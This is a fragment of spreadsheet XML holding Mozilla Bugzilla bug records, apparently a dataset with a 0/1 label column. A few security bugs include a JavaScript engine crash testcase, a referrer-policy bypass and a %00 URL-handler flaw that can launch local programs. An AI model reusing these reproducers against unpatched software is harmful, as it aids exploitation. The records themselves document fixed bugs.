      <c r="J3913" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K3913" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L3913" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3913" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3913" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3913" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3913" t="inlineStr">
        <is>
          <t>[modal-enhancements]</t>
        </is>
      </c>
      <c r="Q3913" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3913" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3913" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3913" t="n">
        <v>1</v>
      </c>
      <c r="U3913" t="n">
        <v>0</v>
      </c>
      <c r="V3913" t="n">
        <v>8</v>
      </c>
      <c r="W3913" t="inlineStr">
        <is>
          <t>Bugzilla 2017.03.07
When I view the history of a bug report, I want to keep the bug report itself available so that I can scroll to the data of a history item.  This was the standard feature of the old Bugzilla and should be restored in the new one.</t>
        </is>
      </c>
      <c r="X3913" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3914">
      <c r="A3914" t="n">
        <v>1424469</v>
      </c>
      <c r="B3914" t="inlineStr">
        <is>
          <t>2017-12-09 00:08:21 -0800</t>
        </is>
      </c>
      <c r="C3914" t="inlineStr">
        <is>
          <t>The Downloads view in the Library window doesn't get focus when opened</t>
        </is>
      </c>
      <c r="D3914" t="inlineStr">
        <is>
          <t>2018-02-06 03:48:16 -0800</t>
        </is>
      </c>
      <c r="E3914" t="n">
        <v>1</v>
      </c>
      <c r="F3914" t="n">
        <v>1</v>
      </c>
      <c r="G3914" t="n">
        <v>2</v>
      </c>
      <c r="H3914" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3914" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3914" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K3914" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3914" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3914" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3914" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3914" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3914" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q3914" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3914" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3914" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T3914" t="n">
        <v>1</v>
      </c>
      <c r="U3914" t="n">
        <v>0</v>
      </c>
      <c r="V3914" t="n">
        <v>16</v>
      </c>
      <c r="W3914" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Build ID: 20171207220423
Steps to reproduce:
press ctrl + J to focus the downloads list
Actual results:
NVDA says library. I need to press shift + tab to focus and read the list.
Expected results:
NVDA should focus and read the first item in the list.</t>
        </is>
      </c>
      <c r="X3914" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3915">
      <c r="A3915" t="n">
        <v>226669</v>
      </c>
      <c r="B3915" t="inlineStr">
        <is>
          <t>2003-11-24 12:16:10 -0800</t>
        </is>
      </c>
      <c r="C3915" t="inlineStr">
        <is>
          <t>Thunderbird tries to download nonexisting messages with POP3</t>
        </is>
      </c>
      <c r="D3915" t="inlineStr">
        <is>
          <t>2009-01-22 10:17:31 -0800</t>
        </is>
      </c>
      <c r="E3915" t="n">
        <v>1</v>
      </c>
      <c r="F3915" t="n">
        <v>1</v>
      </c>
      <c r="G3915" t="n">
        <v>3</v>
      </c>
      <c r="H3915" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3915" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3915" t="inlineStr">
        <is>
          <t>Networking: POP</t>
        </is>
      </c>
      <c r="K3915" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3915" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3915" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3915" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q3915" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3915" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3915" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3915" t="n">
        <v>1</v>
      </c>
      <c r="U3915" t="n">
        <v>0</v>
      </c>
      <c r="V3915" t="n">
        <v>26</v>
      </c>
      <c r="W3915" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Build Identifier: Mozilla Tunderbird 0.4a (20031119)
I'm using a small pop3 proxy which scans my incoming mail headers and deletes 
spam directly on the server. 
However if I try to get my mail using Thunderbird over my proxy, it always 
fails, I get an "-ERR message is deleted" response from the server. 
Thunderbird correctly sends LIST and UIDL to the server. My proxy did already 
delete some messages, so that they aren't included in the response to LIST/UIDL 
anymore. 
Example (message with index 2 has been deleted): 
UIDL 
+OK mailbox has 2 messages (23612 octets) 
1 4dc74a92bfa4d7s8 
3 613d71dfdc905ee0 
The next thing Thunderbird does is to retrieve the mails with the UIDs it 
doesn't know yet. The problem is that Thunderbird also sends a RETR 2 command, 
which fails. 
I could think of the following reasons for this bug: 
- Thunderbird does not correctly parse the output of LIST/UIDL 
- the internal UID list does not get initialized properly (no UID for mail with 
index 2 received -&gt; 0 or random data as UID) 
- Thunderbird tries to download messages with 0 UIDs (in case the internal UID 
list gets zero-initialized) 
I've tested the Win32 build of Mozilla Tunderbird 0.4a (20031119) 
Reproducible: Always
Steps to Reproduce:
I've been redirected to BugZilla, the original report can be found here: 
http://forums.mozillazine.org/viewtopic.php?p=274792#274792</t>
        </is>
      </c>
      <c r="X3915" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3916">
      <c r="A3916" t="n">
        <v>1221904</v>
      </c>
      <c r="B3916" t="inlineStr">
        <is>
          <t>2015-11-04 23:44:21 -0800</t>
        </is>
      </c>
      <c r="C3916" t="inlineStr">
        <is>
          <t>"ASSERTION: Invalid offset" with bidi text change</t>
        </is>
      </c>
      <c r="D3916" t="inlineStr">
        <is>
          <t>2018-07-02 02:57:23 -0700</t>
        </is>
      </c>
      <c r="E3916" t="n">
        <v>1</v>
      </c>
      <c r="F3916" t="n">
        <v>1</v>
      </c>
      <c r="G3916" t="n">
        <v>3</v>
      </c>
      <c r="H3916" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3916" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3916" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3916" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3916" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3916" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P3916" t="inlineStr">
        <is>
          <t>[fixed on trunk (45) by bug 1216096][adv-main43+]</t>
        </is>
      </c>
      <c r="Q3916" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3916" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3916" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3916" t="n">
        <v>1</v>
      </c>
      <c r="U3916" t="n">
        <v>0</v>
      </c>
      <c r="V3916" t="n">
        <v>17</v>
      </c>
      <c r="W3916" t="inlineStr">
        <is>
          <t>Created attachment 8683540
testcase
###!!! ASSERTION: Invalid offset: 'uint32_t(aOffset) &lt;= mSkipChars-&gt;mCharCount', file gfx/thebes/gfxSkipChars.cpp, line 23
###!!! ASSERTION: Text run does not map enough text for our reflow: 'gfxSkipCharsIterator(iter).ConvertOriginalToSkipped(offset + length) &lt;= mTextRun-&gt;GetLength()', file layout/generic/nsTextFrame.cpp, line 8480</t>
        </is>
      </c>
      <c r="X3916" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3917">
      <c r="A3917" t="n">
        <v>134758</v>
      </c>
      <c r="B3917" t="inlineStr">
        <is>
          <t>2002-04-01 17:05:29 -0800</t>
        </is>
      </c>
      <c r="C3917" t="inlineStr">
        <is>
          <t>win32 static build broken</t>
        </is>
      </c>
      <c r="D3917" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3917" t="n">
        <v>1</v>
      </c>
      <c r="F3917" t="n">
        <v>1</v>
      </c>
      <c r="G3917" t="n">
        <v>2</v>
      </c>
      <c r="H3917" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3917" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3917" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K3917" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3917" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3917" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N3917" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3917" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3917" t="inlineStr">
        <is>
          <t>[ADT1]</t>
        </is>
      </c>
      <c r="Q3917" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3917" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3917" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T3917" t="n">
        <v>1</v>
      </c>
      <c r="U3917" t="n">
        <v>0</v>
      </c>
      <c r="V3917" t="n">
        <v>10</v>
      </c>
      <c r="W3917" t="inlineStr">
        <is>
          <t>check-in log broke windows static build
http://bonsai.mozilla.org/cvsquery.cgi?module=MozillaTinderboxAll&amp;date=explicit&amp;mindate=1017542280&amp;maxdate=1017545579
looks like it's Srilatha check-in caused the following err
nsMetaModule_mail.obj : error LNK2001: unresolved external symbol "struct
nsModuleInfo  nsComm4xMailImport_gModuleInfo"
(?nsComm4xMailImport_gModuleInfo@@3UnsModuleInfo@@A)
.\WIN32_O.OBJ\mail.dll : fatal error LNK1120: 1 unresolved externals
NMAKE : fatal error U1077: 'link' : return code '0x460'
NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE"' : return code '0x2'
NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE"' : return code '0x2'
NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE"' : return code '0x2'
NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual
Studio\VC98\Bin\NMAKE.EXE"' : return code '0x2'</t>
        </is>
      </c>
      <c r="X3917" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3918">
      <c r="A3918" t="n">
        <v>1720031</v>
      </c>
      <c r="B3918" t="inlineStr">
        <is>
          <t>2021-07-11 07:28:34 -0700</t>
        </is>
      </c>
      <c r="C3918" t="inlineStr">
        <is>
          <t>Assertion failure: !IsInsideNursery(thing) at AtomMarking.cpp:206</t>
        </is>
      </c>
      <c r="D3918" t="inlineStr">
        <is>
          <t>2024-05-30 10:34:41 -0700</t>
        </is>
      </c>
      <c r="E3918" t="n">
        <v>1</v>
      </c>
      <c r="F3918" t="n">
        <v>1</v>
      </c>
      <c r="G3918" t="n">
        <v>3</v>
      </c>
      <c r="H3918" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3918" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3918" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3918" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3918" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3918" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3918" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3918" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3918" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main91+][adv-esr78.13+]</t>
        </is>
      </c>
      <c r="Q3918" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3918" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3918" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T3918" t="n">
        <v>1</v>
      </c>
      <c r="U3918" t="n">
        <v>0</v>
      </c>
      <c r="V3918" t="n">
        <v>23</v>
      </c>
      <c r="W3918" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Steps to reproduce:
The following sample triggers `MOZ_ASSERT(!IsInsideNursery(thing));` at this location (in debug builds):
https://searchfox.org/mozilla-central/rev/6550c23862b4ed287843057fd30dbae789bd9b0b/js/src/gc/AtomMarking.cpp#206
Release builds crash with a NULL-deref here:
https://searchfox.org/mozilla-central/rev/6550c23862b4ed287843057fd30dbae789bd9b0b/js/src/util/Text.h#99
Older versions (e.g. git c4573875e2765595093d23b2e73cfa3a976a4ed0 from Mar 2019) crash with:
Hit MOZ_CRASH(*** Zone mismatch 0x7f7c049f4000 vs. 0xfffe2f2f2f2f2f2f at argument 0) at js/src/vm/JSContext-inl.h:48
shell arguments:
```
obj-x86_64-pc-linux-gnu/dist/bin/js --no-threads --cpu-count=1 --ion-offthread-compile=off --baseline-warmup-threshold=10 --ion-warmup-threshold=100 crash.js
```
```
function main() {
    const v13 = []; 
    let v15 = "1";
    for (let v16 = "0"; v16 !== 65535; v16 = v16 + v15) {
        if (v16) {
            v15 = "0";
        }   
        const v21 = ["9",v16];
        Reflect.apply(String.fromCharCode,String,v21);
    }   
}
main();
```</t>
        </is>
      </c>
      <c r="X3918" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3919">
      <c r="A3919" t="n">
        <v>690357</v>
      </c>
      <c r="B3919" t="inlineStr">
        <is>
          <t>2011-09-29 08:10:34 -0700</t>
        </is>
      </c>
      <c r="C3919" t="inlineStr">
        <is>
          <t>Request for a "Website" field</t>
        </is>
      </c>
      <c r="D3919" t="inlineStr">
        <is>
          <t>2012-04-19 20:11:58 -0700</t>
        </is>
      </c>
      <c r="E3919" t="n">
        <v>1</v>
      </c>
      <c r="F3919" t="n">
        <v>1</v>
      </c>
      <c r="G3919" t="n">
        <v>5</v>
      </c>
      <c r="H3919" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3919" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J3919" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K3919" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3919" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3919" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3919" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3919" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3919" t="inlineStr">
        <is>
          <t>[l10n impact][good first bug]</t>
        </is>
      </c>
      <c r="Q3919" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3919" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3919" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3919" t="n">
        <v>1</v>
      </c>
      <c r="U3919" t="n">
        <v>0</v>
      </c>
      <c r="V3919" t="n">
        <v>9</v>
      </c>
      <c r="W3919" t="inlineStr">
        <is>
          <t>It'd be great to add a "Website" field to people's phonebook profiles. Reasons include:
1. Blog Discovery
2. Syncing with planet.mozilla.org or any other team planets
3. extra URLs for Firefox testing ;). We need to make sure our community's websites work well in Firefox, right?
Things to consider (off the top of my head):
* Any LDAP concerns?
* limiting text within the field to start with a "http://"
* length of the URL</t>
        </is>
      </c>
      <c r="X3919" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3920">
      <c r="A3920" t="n">
        <v>1397064</v>
      </c>
      <c r="B3920" t="inlineStr">
        <is>
          <t>2017-09-05 16:43:39 -0700</t>
        </is>
      </c>
      <c r="C3920" t="inlineStr">
        <is>
          <t>Referrer leaked even after setting referrer policy attribute</t>
        </is>
      </c>
      <c r="D3920" t="inlineStr">
        <is>
          <t>2018-02-06 08:53:12 -0800</t>
        </is>
      </c>
      <c r="E3920" t="n">
        <v>1</v>
      </c>
      <c r="F3920" t="n">
        <v>1</v>
      </c>
      <c r="G3920" t="n">
        <v>3</v>
      </c>
      <c r="H3920" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3920" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3920" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3920" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3920" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3920" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3920" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3920" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3920" t="inlineStr">
        <is>
          <t>[adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3920" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3920" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3920" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T3920" t="n">
        <v>0</v>
      </c>
      <c r="U3920" t="n">
        <v>0</v>
      </c>
      <c r="V3920" t="n">
        <v>12</v>
      </c>
      <c r="W3920" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Steps to reproduce:
1. Go to https://test.shhnjk.com/refpol.html
Actual results:
Referrer is leaked to cross-origin website.
Expected results:
https://bugzilla.mozilla.org/show_bug.cgi?id=1264165 added support for referrer policy attributes. But somehow &lt;link&gt; sends 2 requests, 1 with referrer and 1 without referrer, which bypasses this policy.</t>
        </is>
      </c>
      <c r="X3920" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3921">
      <c r="A3921" t="n">
        <v>389580</v>
      </c>
      <c r="B3921" t="inlineStr">
        <is>
          <t>2007-07-25 12:55:18 -0700</t>
        </is>
      </c>
      <c r="C3921" t="inlineStr">
        <is>
          <t>some schemes with %00 launch unexpected handlers on windows</t>
        </is>
      </c>
      <c r="D3921" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E3921" t="n">
        <v>1</v>
      </c>
      <c r="F3921" t="n">
        <v>1</v>
      </c>
      <c r="G3921" t="n">
        <v>6</v>
      </c>
      <c r="H3921" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3921" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3921" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3921" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3921" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3921" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3921" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3921" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3921" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q3921" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3921" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3921" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3921" t="n">
        <v>1</v>
      </c>
      <c r="U3921" t="n">
        <v>0</v>
      </c>
      <c r="V3921" t="n">
        <v>41</v>
      </c>
      <c r="W3921" t="inlineStr">
        <is>
          <t>On Windows XP some urls for "web" protocols that contain %00 launch the wrong handler and appear to be able to launch local programs, with limited argument passing. It is not yet clear that this can be used to compromise a machine but we can always fear the worst.
The same behavior is observed using "Run" from the Windows Start menu for the affected protocols (http, https, ftp, gopher, telnet, mailto, news, snews, nttp, possibly others?).
The behavior seems to be that if there's a %00 in the URL for these schemes then the URL Protocol handler is not called, instead the FileType handler is called based on the extension of the full url. The url is then passed to that File handler. For "non-web" URL handlers the URL is passed to the expected handler.
In Firefox browser protocols are handled internally so are not vulnerable, but the mailnews protocols are handed off to the OS and can be abused in this way.
The fix in bug 389106 mitigates the published testcases but doesn't actually "fix" the problem.
http://xs-sniper.com/blog/remote-command-exec-firefox-2005/</t>
        </is>
      </c>
      <c r="X3921" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3922">
      <c r="A3922" t="n">
        <v>22785</v>
      </c>
      <c r="B3922" t="inlineStr">
        <is>
          <t>1999-12-28 20:50:03 -0800</t>
        </is>
      </c>
      <c r="C3922" t="inlineStr">
        <is>
          <t>[DOGFOOD][REGRESSION]Crash attempting to read mail</t>
        </is>
      </c>
      <c r="D3922" t="inlineStr">
        <is>
          <t>2008-07-31 01:23:50 -0700</t>
        </is>
      </c>
      <c r="E3922" t="n">
        <v>1</v>
      </c>
      <c r="F3922" t="n">
        <v>1</v>
      </c>
      <c r="G3922" t="n">
        <v>3</v>
      </c>
      <c r="H3922" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3922" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3922" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3922" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3922" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3922" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3922" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3922" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q3922" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3922" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3922" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3922" t="n">
        <v>1</v>
      </c>
      <c r="U3922" t="n">
        <v>0</v>
      </c>
      <c r="V3922" t="n">
        <v>10</v>
      </c>
      <c r="W3922" t="inlineStr">
        <is>
          <t>Saw this on Win and Linux builds 1999-12-28-08 M13
Steps to reproduce:
1)Launch Seamonkey and login to Mail.(I used an Imap account)
2) Clcik on the inbox to view the list of mail there. WHen it is all retrieved,
click once on any piece of mail to view it's contents.
You will crash.
 Talkback trace follows:
Incident ID 3199512
 Trigger Time
               1999-12-28 19:36:11
 Email Address
               scalkins@netscape.com
 User Comments
               Crash clicking on a Mail message to read it in Win. Build
1999-12-28-08 M13
 Build ID
               1999122809
 Product ID
               Communicator5.0
 Platform ID
               Win32
 Stack Trace
HTMLStyleSheetImpl::~HTMLStyleSheetImpl
[d:\builds\seamonkey\mozilla\layout\html\style\src\nsHTMLStyleSheet.cpp, line
538]
HTMLStyleSheetImpl::`scalar deleting destructor'
HTMLStyleSheetImpl::Release
[d:\builds\seamonkey\mozilla\layout\html\style\src\nsHTMLStyleSheet.cpp, line
566]
nsCOMPtr_base::~nsCOMPtr_base
[d:\builds\seamonkey\mozilla\xpcom\base\nsCOMPtr.cpp, line 45]
nsXULDocument::PrepareStyleSheets
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp, line 658]
nsXULDocument::StartDocumentLoad
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp, line 702]
nsLayoutDLF::CreateRDFDocument
[d:\builds\seamonkey\mozilla\layout\build\nsLayoutDLF.cpp, line 456]
nsLayoutDLF::CreateInstance
[d:\builds\seamonkey\mozilla\layout\build\nsLayoutDLF.cpp, line 280]
nsWebShell::CreateViewer
[d:\builds\seamonkey\mozilla\webshell\src\nsWebShell.cpp, line 1793]
nsWebShell::DoContent [d:\builds\seamonkey\mozilla\webshell\src\nsWebShell.cpp,
line 1746]
nsDocumentOpenInfo::DispatchContent
[d:\builds\seamonkey\mozilla\uriloader\base\nsURILoader.cpp, line 279]
nsDocumentOpenInfo::OnStartRequest
[d:\builds\seamonkey\mozilla\uriloader\base\nsURILoader.cpp, line 219]
nsOnStartRequestEvent::HandleEvent
[d:\builds\seamonkey\mozilla\netwerk\base\src\nsAsyncStreamListener.cpp, line
199]
nsStreamListenerEvent::HandlePLEvent
[d:\builds\seamonkey\mozilla\netwerk\base\src\nsAsyncStreamListener.cpp, line
94]
PL_HandleEvent [plevent.c, line 523]
_md_EventReceiverProc [plevent.c, line 955]
USER32.dll + 0x1820 (0x77e71820)</t>
        </is>
      </c>
      <c r="X3922" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3923">
      <c r="A3923" t="n">
        <v>683864</v>
      </c>
      <c r="B3923" t="inlineStr">
        <is>
          <t>2011-09-01 04:15:20 -0700</t>
        </is>
      </c>
      <c r="C3923" t="inlineStr">
        <is>
          <t>fx 3.6 nightlies are orange</t>
        </is>
      </c>
      <c r="D3923" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3923" t="n">
        <v>1</v>
      </c>
      <c r="F3923" t="n">
        <v>1</v>
      </c>
      <c r="G3923" t="n">
        <v>5</v>
      </c>
      <c r="H3923" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3923" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3923" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3923" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3923" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3923" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3923" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3923" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3923" t="inlineStr">
        <is>
          <t>[updates][l10n]</t>
        </is>
      </c>
      <c r="Q3923" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3923" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3923" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3923" t="n">
        <v>1</v>
      </c>
      <c r="U3923" t="n">
        <v>0</v>
      </c>
      <c r="V3923" t="n">
        <v>8</v>
      </c>
      <c r="W3923" t="inlineStr">
        <is>
          <t>The nightlies on http://l10n.mozilla.org/~axel/nightlies/?date=2011-08-31 for fx3.6 are all orange. No idea why and what that practically means.</t>
        </is>
      </c>
      <c r="X3923" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3924">
      <c r="A3924" t="n">
        <v>1413547</v>
      </c>
      <c r="B3924" t="inlineStr">
        <is>
          <t>2017-11-01 07:34:42 -0700</t>
        </is>
      </c>
      <c r="C3924" t="inlineStr">
        <is>
          <t>Identify cause of Treeherder prod RDS instance failover on 20th Oct and 1st Nov</t>
        </is>
      </c>
      <c r="D3924" t="inlineStr">
        <is>
